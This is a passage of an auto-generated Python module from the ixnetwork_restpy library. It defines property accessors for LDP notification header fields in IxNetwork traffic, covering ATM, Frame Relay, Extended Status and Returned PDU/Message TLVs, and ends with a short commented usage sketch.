from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVBits']))
@property
def AtmLabelTLVVpi(self):
"""
Display Name: VPI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVpi']))
@property
def AtmLabelTLVVci(self):
"""
Display Name: VCI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVci']))
@property
def FrameRelayLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVUBit']))
@property
def FrameRelayLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVFBit']))
@property
def FrameRelayLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0202
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVType']))
@property
def FrameRelayLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVLength']))
@property
def FrameRelayLabelTLVReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVReserved']))
@property
def FrameRelayLabelTLVDlciLength(self):
"""
Display Name: DLCI length
Default Value: 0
Value Format: decimal
Available enum values: 10 bits, 0, 23 bits, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVDlciLength']))
@property
def FrameRelayLabelTLVDlci(self):
"""
Display Name: DLCI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVDlci']))
@property
def ExtendedStatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVUBit']))
@property
def ExtendedStatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVFBit']))
@property
def ExtendedStatusTLVType(self):
"""
Display Name: Type
Default Value: 0x0301
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVType']))
@property
def ExtendedStatusTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVLength']))
@property
def ExtendedStatusTLVCode(self):
"""
Display Name: Code
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVCode']))
@property
def ReturnedPDUTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVUBit']))
@property
def ReturnedPDUTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVFBit']))
@property
def ReturnedPDUTLVType(self):
"""
Display Name: Type
Default Value: 0x0302
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVType']))
@property
def ReturnedPDUTLVLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVLength']))
@property
def ReturnedMessageTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVUBit']))
@property
def ReturnedMessageTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVFBit']))
@property
def ReturnedMessageTLVType(self):
"""
Display Name: Type
Default Value: 0x0303
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVType']))
@property
def ReturnedMessageTLVLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVLength']))
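# add() below creates this template instance on the server from the currently set local
# attribute values, via the inherited _map_locals()/_create() helpers.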
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
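# Rough end-to-end sketch (assumptions: a reachable IxNetwork API server, the
# SessionAssistant helper shipped with recent ixnetwork_restpy releases, and placeholder
# host/navigation that are not part of this module):
#
#   from ixnetwork_restpy import SessionAssistant
#   session = SessionAssistant(IpAddress='127.0.0.1')     # hypothetical API server
#   ixnetwork = session.Ixnetwork
#   # ... build a traffic item whose stack includes an ldpNotification header, obtain
#   # the corresponding LdpNotification stack object as 'ldp', then drive its fields:
#   # ldp.StatusTLVMessageType.Single('256')
#   # ldp.HoldTimerExpiredEBit.Single('1')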